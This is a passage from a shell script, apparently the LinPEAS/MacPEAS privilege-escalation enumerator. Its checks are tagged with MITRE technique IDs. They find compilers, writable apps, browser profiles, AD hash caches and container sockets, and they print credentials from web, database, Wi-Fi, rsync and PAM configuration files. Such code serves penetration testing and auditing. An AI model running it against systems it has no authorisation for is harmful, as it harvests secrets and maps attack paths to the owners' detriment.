   9978   (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
   9979   echo ""
   9980   if [ "$(command -v pkg 2>/dev/null || echo -n '')" ]; then
   9981       print_2title "Vulnerable Packages" "T1587.001"
   9982       pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g"
   9983       echo ""
   9984   fi
   9985   if [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then
   9986       print_2title "Brew Installed Packages" "T1587.001"
   9987       brew list
   9988       echo ""
   9989   fi
   9990 fi
   9991 
   9992 fi
   9993 
   9994 if check_mitre_filter "T1574"; then
   9995 if [ "$MACPEAS" ]; then
   9996     print_2title "Writable Installed Applications" "T1574"
   9997     system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
   9998         if [ -w "$f" ]; then
   9999             echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
  10000         fi
  10001     done
  10002     system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
  10003         if [ -w "$f" ]; then
  10004             echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
  10005         fi
  10006     done
  10007 fi
  10008 
  10009 fi
  10010 
  10011 if check_mitre_filter "T1552.001"; then
  10012 if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG" ]; then
  10013   print_2title "Analyzing Apache-Nginx Files (limit 70)"
  10014     echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"
  10015     echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)"
  10016     if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi
  10017     if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi
  10018     print_3title 'PHP exec extensions'
  10019     if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|DocumentRoot|AllowOverride|ProxyPass|ProxyPassReverse|RemoteIPHeader|SetEnvIf.*X-Forwarded|ErrorDocument|server-status|command on,${SED_RED},g"; done; echo "";done; echo "";
  10020     if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|DocumentRoot|AllowOverride|ProxyPass|ProxyPassReverse|RemoteIPHeader|SetEnvIf.*X-Forwarded|ErrorDocument|server-status,${SED_RED},g"; done; echo "";
  10021     if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "php\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo "";
  10022     if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|fastcgi_pass|alias|try_files|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo "";
  10023     if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|fastcgi_pass|alias|try_files|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo "";done; echo "";
  10024 fi
  10025 
  10026 
  10027 fi
  10028 
  10029 if check_mitre_filter "T1552.005"; then
  10030 AWSVAULT="$(command -v aws-vault 2>/dev/null || echo -n '')"
  10031 if [ "$AWSVAULT" ] || [ "$DEBUG" ]; then
  10032   print_2title "Check aws-vault" "T1552.005"
  10033   aws-vault list
  10034 fi
  10035 
  10036 fi
  10037 
  10038 if check_mitre_filter "T1539,T1217"; then
  10039 print_2title "Browser Profiles" "T1539,T1217"
  10040 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#browser-data"
  10041 echo ""
  10042 for h in $HOMESEARCH; do
  10043   [ -d "$h" ] || continue
  10044   firefox_ini="$h/.mozilla/firefox/profiles.ini"
  10045   if [ -f "$firefox_ini" ]; then
  10046     print_3title "Firefox profiles ($h)" "T1539,T1217"
  10047     awk -F= '
  10048       /^\[Profile/ { in_profile=1 }
  10049       /^Path=/ { path=$2 }
  10050       /^IsRelative=/ { isrel=$2 }
  10051       /^$/ {
  10052         if (path != "") {
  10053           if (isrel == "1") {
  10054             print base "/.mozilla/firefox/" path
  10055           } else {
  10056             print path
  10057           }
  10058         }
  10059         path=""; isrel=""
  10060       }
  10061       END {
  10062         if (path != "") {
  10063           if (isrel == "1") {
  10064             print base "/.mozilla/firefox/" path
  10065           } else {
  10066             print path
  10067           }
  10068         }
  10069       }
  10070     ' base="$h" "$firefox_ini" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
  10071     echo ""
  10072   fi
  10073   for chrome_base in "$h/.config/google-chrome" "$h/.config/chromium" "$h/.config/BraveSoftware/Brave-Browser" "$h/.config/microsoft-edge" "$h/.config/microsoft-edge-beta" "$h/.config/microsoft-edge-dev"; do
  10074     if [ -d "$chrome_base" ]; then
  10075       profiles=$(find "$chrome_base" -maxdepth 1 -type d \( -name "Default" -o -name "Profile *" \) 2>/dev/null)
  10076       if [ "$profiles" ]; then
  10077         print_3title "Chromium profiles ($chrome_base)" "T1539,T1217"
  10078         printf "%s\n" "$profiles" | sed -${E} "s,.*,${SED_RED},"
  10079         echo ""
  10080       fi
  10081     fi
  10082   done
  10083 done
  10084 
  10085 fi
  10086 
  10087 if check_mitre_filter "T1003.003"; then
  10088 adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
  10089 if [ "$adhashes" ] || [ "$DEBUG" ]; then
  10090   print_2title "Searching AD cached hashes" "T1003.003"
  10091   ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
  10092   echo ""
  10093 fi
  10094 
  10095 fi
  10096 
  10097 if check_mitre_filter "T1613"; then
  10098 if ! [ "$SEARCH_IN_FOLDER" ]; then
  10099   containerd=$(command -v containerd || echo -n '')
  10100   containerd_cli=$(command -v ctr || echo -n '')
  10101   nerdctl_cli=$(command -v nerdctl || echo -n '')
  10102   crictl_cli=$(command -v crictl || echo -n '')
  10103   if [ "$containerd" ] || [ "$containerd_cli" ] || [ "$nerdctl_cli" ] || [ "$crictl_cli" ] || [ "$DEBUG" ]; then
  10104     print_2title "Checking if containerd/CRI tooling is available" "T1613"
  10105     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/runtime-api-and-daemon-exposure.html"
  10106     if [ "$containerd" ]; then
  10107       echo "containerd was found in $containerd" | sed -${E} "s,.*,${SED_RED},"
  10108     fi
  10109     if [ "$containerd_cli" ]; then
  10110       echo "ctr was found in $containerd_cli, you may be able to inspect or manage containerd content with it" | sed -${E} "s,.*,${SED_RED},"
  10111       ctr image list 2>&1
  10112     fi
  10113     if [ "$nerdctl_cli" ]; then
  10114       echo "nerdctl was found in $nerdctl_cli, you may be able to interact with containerd namespaces and containers with it" | sed -${E} "s,.*,${SED_RED},"
  10115       nerdctl images 2>&1
  10116     fi
  10117     if [ "$crictl_cli" ]; then
  10118       echo "crictl was found in $crictl_cli, you may be able to inspect CRI-managed containers with it" | sed -${E} "s,.*,${SED_RED},"
  10119       crictl images 2>&1
  10120     fi
  10121     echo ""
  10122   fi
  10123 fi
  10124 
  10125 fi
  10126 
  10127 if check_mitre_filter "T1613"; then
  10128 if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then
  10129   print_2title "Searching docker files (limit 70)" "T1613"
  10130   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/index.html"
  10131   printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do
  10132     ls -l "$f" 2>/dev/null
  10133     if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
  10134       echo "Docker related socket ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  10135     fi
  10136   done
  10137   echo ""
  10138 fi
  10139 
  10140 fi
  10141 
  10142 if check_mitre_filter "T1552.001"; then
  10143 # Needs testing
  10144 dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
  10145 if [ "$dovecotpass" ] || [ "$DEBUG" ]; then
  10146   print_2title "Searching dovecot files" "T1552.001"
  10147   if [ -z "$dovecotpass" ]; then
  10148     echo_not_found "dovecot credentials"
  10149   else
  10150     printf "%s\n" "$dovecotpass" | while read d; do
  10151       df=$(echo $d |cut -d ':' -f1)
  10152       dp=$(echo $d |cut -d ':' -f2-)
  10153       echo "Found possible PLAIN text creds in $df"
  10154       echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
  10155     done
  10156   fi
  10157   echo ""
  10158 fi
  10159 
  10160 fi
  10161 
  10162 if check_mitre_filter "T1082,T1068"; then
  10163 if ! [ "$SEARCH_IN_FOLDER" ]; then
  10164   checkNeedrestartCVE202448990
  10165 fi
  10166 if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then
  10167   print_2title "Analyzing MariaDB Files (limit 70)"
  10168     if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*|local_infile.*,${SED_RED},g"; done; echo "";
  10169     if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g"; done; echo "";
  10170 fi
  10171 
  10172 
  10173 if [ "$PSTORAGE_VARNISH" ] || [ "$DEBUG" ]; then
  10174   print_2title "Analyzing Varnish Files (limit 70)"
  10175     if ! [ "`echo \"$PSTORAGE_VARNISH\" | grep -E \"varnish$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "varnish"; fi; fi; printf "%s" "$PSTORAGE_VARNISH" | grep -E "varnish$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,varnish$,${SED_RED},"; find "$f" -name "default.vcl" | while read ff; do ls -ld "$ff" | sed -${E} "s,default.vcl,${SED_RED},"; done; echo "";find "$f" -name "secret" | while read ff; do ls -ld "$ff" | sed -${E} "s,secret,${SED_RED},"; done; echo "";done; echo "";
  10176 fi
  10177 
  10178 
  10179 if [ "$PSTORAGE_APACHE_AIRFLOW" ] || [ "$DEBUG" ]; then
  10180   print_2title "Analyzing Apache-Airflow Files (limit 70)"
  10181     if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"airflow\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "airflow.cfg"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E "airflow\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,airflow\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,access_control_allow_headers|access_control_allow_methods|access_control_allow_origins|auth_backend|backend.default|google_key_path.*|password|username|flower_basic_auth.*|result_backend.*|ssl_cacert|ssl_cert|ssl_key|fernet_key.*|tls_ca|tls_cert|tls_key|ccache|google_key_path|smtp_password.*|smtp_user.*|cookie_samesite|cookie_secure|expose_config|expose_stacktrace|secret_key|x_frame_enabled,${SED_RED},g"; done; echo "";
  10182     if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"webserver_config\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "webserver_config.py"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E "webserver_config\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,webserver_config\.py$,${SED_RED},"; done; echo "";
  10183 fi
  10184 
  10185 
  10186 if [ "$PSTORAGE_X11" ] || [ "$DEBUG" ]; then
  10187   print_2title "Analyzing X11 Files (limit 70)"
  10188     if ! [ "`echo \"$PSTORAGE_X11\" | grep -E \"\.Xauthority$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".Xauthority"; fi; fi; printf "%s" "$PSTORAGE_X11" | grep -E "\.Xauthority$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.Xauthority$,${SED_RED},"; done; echo "";
  10189 fi
  10190 
  10191 
  10192 if [ "$PSTORAGE_WORDPRESS" ] || [ "$DEBUG" ]; then
  10193   print_2title "Analyzing Wordpress Files (limit 70)"
  10194     if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wp-config.php"; fi; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo "";
  10195 fi
  10196 
  10197 
  10198 if [ "$PSTORAGE_DRUPAL" ] || [ "$DEBUG" ]; then
  10199   print_2title "Analyzing Drupal Files (limit 70)"
  10200     if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "settings.php"; fi; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo "";
  10201 fi
  10202 
  10203 
  10204 if [ "$PSTORAGE_MOODLE" ] || [ "$DEBUG" ]; then
  10205   print_2title "Analyzing Moodle Files (limit 70)"
  10206     if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.php"; fi; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo "";
  10207 fi
  10208 
  10209 
  10210 if [ "$PSTORAGE_TOMCAT" ] || [ "$DEBUG" ]; then
  10211   print_2title "Analyzing Tomcat Files (limit 70)"
  10212     if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "tomcat-users.xml"; fi; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo "";
  10213 fi
  10214 
  10215 
  10216 if [ "$PSTORAGE_MONGO" ] || [ "$DEBUG" ]; then
  10217   print_2title "Analyzing Mongo Files (limit 70)"
  10218     echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)"
  10219     if [ "$(command -v mongo)" ]; then echo "show dbs" | mongo 127.0.0.1 > /dev/null 2>&1;[ "$?" == "0" ] && echo "Possible mongo anonymous authentication" | sed -${E} "s,.*|kube,${SED_RED},"; fi
  10220     if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mongod*.conf"; fi; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo "";
  10221 fi
  10222 
  10223 
  10224 if [ "$PSTORAGE_ROCKETCHAT" ] || [ "$DEBUG" ]; then
  10225   print_2title "Analyzing Rocketchat Files (limit 70)"
  10226     if ! [ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s" "$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E} "s,mongodb://.*,${SED_RED},g"; done; echo "";
  10227 fi
  10228 
  10229 
  10230 if [ "$PSTORAGE_SUPERVISORD" ] || [ "$DEBUG" ]; then
  10231   print_2title "Analyzing Supervisord Files (limit 70)"
  10232     if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "supervisord.conf"; fi; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo "";
  10233 fi
  10234 
  10235 
  10236 if [ "$PSTORAGE_CESI" ] || [ "$DEBUG" ]; then
  10237   print_2title "Analyzing Cesi Files (limit 70)"
  10238     if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cesi.conf"; fi; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo "";
  10239 fi
  10240 
  10241 
  10242 if [ "$PSTORAGE_RSYNC" ] || [ "$DEBUG" ]; then
  10243   print_2title "Analyzing Rsync Files (limit 70)"
  10244     if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.conf"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo "";
  10245     if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rsyncd.secrets"; fi; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";
  10246 fi
  10247 
  10248 
  10249 if [ "$PSTORAGE_RPCD" ] || [ "$DEBUG" ]; then
  10250   print_2title "Analyzing Rpcd Files (limit 70)"
  10251     if ! [ "`echo \"$PSTORAGE_RPCD\" | grep -E \"rpcd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "rpcd"; fi; fi; printf "%s" "$PSTORAGE_RPCD" | grep -E "rpcd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rpcd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.+|password.+,${SED_RED},g"; done; echo "";
  10252 fi
  10253 
  10254 
  10255 if [ "$PSTORAGE_BITCOIN" ] || [ "$DEBUG" ]; then
  10256   print_2title "Analyzing Bitcoin Files (limit 70)"
  10257     if ! [ "`echo \"$PSTORAGE_BITCOIN\" | grep -E \"bitcoin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bitcoin.conf"; fi; fi; printf "%s" "$PSTORAGE_BITCOIN" | grep -E "bitcoin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bitcoin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user=.*|password=.*|auth=.*,${SED_RED},g"; done; echo "";
  10258 fi
  10259 
  10260 
  10261 if [ "$PSTORAGE_HOSTAPD" ] || [ "$DEBUG" ]; then
  10262   print_2title "Analyzing Hostapd Files (limit 70)"
  10263     if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hostapd.conf"; fi; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo "";
  10264 fi
  10265 
  10266 
  10267 if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then
  10268   print_2title "Analyzing Wifi Connections Files (limit 70)"
  10269     if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo "";
  10270     if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"wpa_supplicant$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wpa_supplicant"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "wpa_supplicant$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wpa_supplicant$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*|password.*|ssid.*" | sed -${E} "s,psk.*|password.*|ssid.*,${SED_RED},g"; done; echo "";done; echo "";
  10271 fi
  10272 
  10273 
  10274 if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then
  10275   print_2title "Analyzing PAM Auth Files (limit 70)"
  10276     if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^@" | sed -${E} "s,auth|accessfile=|secret=|user,${SED_RED},g"; done; echo "";find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "nullok|nullok_secure|pam_permit\.so|pam_rootok\.so|pam_exec\.so|pam_unix\.so.*(nullok|remember=0)|sufficient\s+pam_unix\.so" | grep -Ev "^#|^@" | sed -${E} "s,nullok|nullok_secure|pam_permit\.so|pam_rootok\.so|pam_exec\.so|pam_unix\.so.*(nullok|remember=0)|sufficient\s+pam_unix\.so,${SED_RED},g"; done; echo "";done; echo "";
  10277 fi
  10278 
  10279 
  10280 if [ "$PSTORAGE_NFS_EXPORTS" ] || [ "$DEBUG" ]; then
  10281   print_2title "Analyzing NFS Exports Files (limit 70)"
  10282     nfsmounts=`cat /proc/mounts 2>/dev/null | grep nfs`; if [ "$nfsmounts" ]; then echo -e "Connected NFS Mounts: \n$nfsmounts"; fi
  10283     if ! [ "`echo \"$PSTORAGE_NFS_EXPORTS\" | grep -E \"exports$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "exports"; fi; fi; printf "%s" "$PSTORAGE_NFS_EXPORTS" | grep -E "exports$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,exports$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,insecure|rw|nohide,${SED_RED},g" | sed -${E} "s,no_root_squash|no_all_squash,${SED_RED_YELLOW},g"; done; echo "";
  10284 fi
  10285 
  10286 
  10287 if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then
  10288   print_2title "Analyzing GlusterFS Files (limit 70)"
  10289     if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.pem$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "glusterfs.pem"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E "glusterfs\.pem$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,glusterfs\.pem$,${SED_RED},"; done; echo "";
